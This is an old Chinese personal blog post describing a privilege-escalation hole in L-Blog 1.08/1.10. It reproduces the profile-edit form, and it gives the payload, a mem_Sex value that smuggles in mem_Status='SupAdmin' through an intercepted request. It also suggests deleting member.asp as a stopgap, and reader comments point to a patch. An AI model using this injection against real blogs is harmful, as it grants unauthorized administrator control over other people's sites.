WenRou's Blog
首页
微语
登录
L-Blog1.08(SE) 提权漏洞
2006-1-9 温柔哥
2006年1月7日11:48星期六 [安全文摘]
用户编辑
编辑个人资料
名称:
9xiao
旧密码:
*
修改资料必须输入原密码
新密码:
*
密码必须是6-16位
确认密码:
性别:
邮箱:
隐藏邮箱
腾讯QQ:
个人主页:
个人简介:
action="http://url/member.asp?action=edit&edit=post" 替换为目标url,1.10版本抓包修改mem_Sex值为“0,mem_Status="SupAdmin"”
先删除掉mebber.asp再说,以后看官方的补丁了!!
评论:
alpar
2006-01-09 10:25
回复
a-blog 1212版用户请下载 [img]http://blog.fz0132.com/images/down.gif[/img] [url=http://laoluo.fz0132.com/update/member.rar]本补丁仅支持A-BLOG1.12以后版本[/url]
温柔幻刀
2005-12-28 18:03
回复
[quote][b]最初由 [color=blue]越战[/color] 发表于 2005-12-22 05:14 PM:[/b]真的不行啊[/quote]可能现在该漏洞已经被官方站点修复了!!!!
发表评论:
昵称
邮件地址 (选填)
个人主页 (选填)
内容